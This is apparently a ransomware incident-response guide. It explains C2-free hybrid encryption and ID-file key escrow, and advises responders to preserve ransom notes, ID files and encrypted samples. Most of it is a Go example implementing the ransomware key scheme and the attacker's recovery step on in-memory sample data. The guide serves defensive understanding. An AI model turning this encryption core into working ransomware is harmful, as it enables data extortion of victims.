Ransomware Emergency Response Guide
1. Attack characteristics of ransomware
Encryption without a C2 server:
During the encryption phase, current ransomware generally no longer talks to a C2 server at all. The sample does not have to send any key material back to the attacker while it encrypts, so blocking or sinkholing its network traffic neither stops nor undoes the encryption. The scheme is:
- Randomly generate a new asymmetric key pair (public and private key) on the victim host before encryption begins;
- Encrypt the files with the newly generated public key (in practice each file is encrypted with a fresh symmetric key and only that key is encrypted with the public key, because asymmetric encryption of whole files is far too slow);
- Encrypt the newly generated private key with the attacker's pre-buried (hard-coded) public key and save the result in an ID file or embed it in each encrypted file. The plaintext private key is then discarded, so nothing left on the host can decrypt the files without the attacker's cooperation.
Decryption process under the no-C2 scheme:
- The victim submits the encrypted private key, taken from the ID string/ID file or from an encrypted file, by e-mail or through the attacker's submission page (the attacker usually provides a tool that extracts it);
- The attacker decrypts the submitted blob with the reserved private key that matches the embedded public key;
- The attacker delivers the recovered private key, or a decryption tool containing it, to the victim, who uses it to decrypt the files.
Because the only recovery path runs through that ID file or embedded blob, responders must preserve the ransom note, the ID file and at least one untouched encrypted file before any clean-up; deleting them destroys the material a later decryptor (or a leaked master key) would need.
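The full lifecycle described above, encryption without a C2 server followed by the attacker-side key recovery, as an added worked example in Go. This is illustration code written for this guide, not code from any ransomware family or from the original page. It assumes the hybrid construction used in practice (a random AES-256-GCM key per payload, wrapped with RSA-OAEP, since RSA alone cannot carry a whole file or a DER-encoded private key), 2048-bit RSA for both the per-victim and the attacker key pair, and a freshly generated attacker key pair standing in for the pre-buried one; the file names and contents are constructed samples, and `Blob`, `seal`, `open`, `check` and `gcmFor` are helper names chosen here.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"fmt"
)

// Blob is one hybrid-encrypted payload (AES-256-GCM key wrapped with RSA-OAEP,
// nonce, ciphertext); it serves for encrypted files and for the "ID file".
type Blob struct{ WrappedKey, Nonce, Ciphertext []byte }

func check(err error) { // aborts on failures only a broken RNG or cipher setup can cause
	if err != nil {
		panic(err)
	}
}

func gcmFor(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	check(err)
	gcm, err := cipher.NewGCM(block)
	check(err)
	return gcm
}

// seal encrypts plaintext to pub. RSA-OAEP carries only a few hundred bytes,
// so the bulk goes through AES-GCM and only the 32-byte AES key is RSA-wrapped.
func seal(pub *rsa.PublicKey, plaintext []byte) *Blob {
	buf := make([]byte, 32+12) // AES-256 key followed by a 96-bit GCM nonce
	_, err := rand.Read(buf)
	check(err)
	key, nonce := buf[:32], buf[32:]
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	check(err)
	return &Blob{wrapped, nonce, gcmFor(key).Seal(nil, nonce, plaintext, nil)}
}

// open reverses seal; it fails unless priv matches the key used to seal.
func open(priv *rsa.PrivateKey, b *Blob) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), nil, priv, b.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	return gcmFor(key).Open(nil, b.Nonce, b.Ciphertext, nil)
}

// EncryptVictim is the offline encryption phase: fresh per-victim RSA keypair, files
// sealed to its public key, that private key sealed to the attacker's pre-buried
// public key as the ID file. No server is contacted and the key never leaves in clear.
func EncryptVictim(attackerPub *rsa.PublicKey, files map[string][]byte) (enc map[string]*Blob, idFile *Blob) {
	victimKey, err := rsa.GenerateKey(rand.Reader, 2048)
	check(err)
	enc = map[string]*Blob{}
	for name, data := range files {
		enc[name] = seal(&victimKey.PublicKey, data)
	}
	return enc, seal(attackerPub, x509.MarshalPKCS1PrivateKey(victimKey))
}

// RecoverVictimKey is the attacker-side step after the ID file is submitted:
// unseal it with the reserved private key. Any other key is rejected.
func RecoverVictimKey(attackerPriv *rsa.PrivateKey, idFile *Blob) (*rsa.PrivateKey, error) {
	der, err := open(attackerPriv, idFile)
	if err != nil {
		return nil, err
	}
	return x509.ParsePKCS1PrivateKey(der)
}

// DecryptFiles is the "decryption tool" handed back to the victim.
func DecryptFiles(victimKey *rsa.PrivateKey, enc map[string]*Blob) (map[string][]byte, error) {
	out, err := map[string][]byte{}, error(nil)
	for name, b := range enc {
		if out[name], err = open(victimKey, b); err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
	}
	return out, nil
}

// RoundTrip runs the lifecycle on constructed sample files and returns the recovered
// plaintexts plus whether an unrelated RSA key (all a responder holding only the
// disk image could try) is rejected by the ID file.
func RoundTrip() (map[string][]byte, bool, error) {
	attackerKey, err := rsa.GenerateKey(rand.Reader, 2048) // stands in for the pre-buried keypair
	check(err)
	unrelated, _ := rsa.GenerateKey(rand.Reader, 2048)
	sample := map[string][]byte{"report.docx": []byte("Q3 figures: revenue up 4%"), "backup.sql": []byte("INSERT INTO users VALUES (1, 'alice');")} // constructed
	enc, idFile := EncryptVictim(&attackerKey.PublicKey, sample)
	_, wrongErr := RecoverVictimKey(unrelated, idFile)
	victimKey, err := RecoverVictimKey(attackerKey, idFile)
	if err != nil {
		return nil, false, err
	}
	files, err := DecryptFiles(victimKey, enc)
	return files, wrongErr != nil, err
}

func main() { fmt.Println(RoundTrip()) }
```

Note that `EncryptVictim` never returns the plaintext victim key: once it goes out of scope only the attacker-sealed ID file remains, which is why the `unrelated` key in `RoundTrip` gets an OAEP decryption error and why the ID file must be preserved during response.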